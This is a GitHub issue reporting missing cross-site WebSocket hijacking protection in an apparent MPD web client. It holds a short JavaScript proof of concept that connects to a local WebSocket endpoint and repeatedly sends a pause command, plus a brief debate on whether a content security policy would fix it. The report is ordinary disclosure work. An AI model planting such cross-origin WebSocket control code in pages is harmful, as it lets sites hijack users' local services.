Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Missing CSRF protection #153

Open
atx opened this issue Jun 11, 2017 · 2 comments
Open

Missing CSRF protection #153

atx opened this issue Jun 11, 2017 · 2 comments

Comments

@atx
Copy link

atx commented Jun 11, 2017

The websocket endpoint is missing CSRF (CSWSH) protection, allowing a malicious website to control the client.

var ws = new WebSocket("ws://127.0.0.1:8080/ws");
ws.onopen = function (event) {
    console.log("OPENED");
    setInterval(function () {
        ws.send("MPD_API_SET_PAUSE");
    }, 1000);
}
ws.onmessage = function (event) {
    console.log("Message " + event.data);
}
@BenjaminHae
Copy link
Contributor

Easiest solution is probably to implement the content security policy connect-src directive. So WebSocket connections are only allowed from the same origin.

@ondras
Copy link

ondras commented Mar 18, 2019

Easiest solution is probably to implement the content security policy connect-src directive. So WebSocket connections are only allowed from the same origin.

I don't think this would fix anything at all. The whole CSP is aimed at protecting a HTML page (so that a malicious injected script/resource cannot do much harm), but the reported vulnerability considers attacker connecting to the (unprotected) websocket endpoint. The endpoint itself has no notion of CSP/protection.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants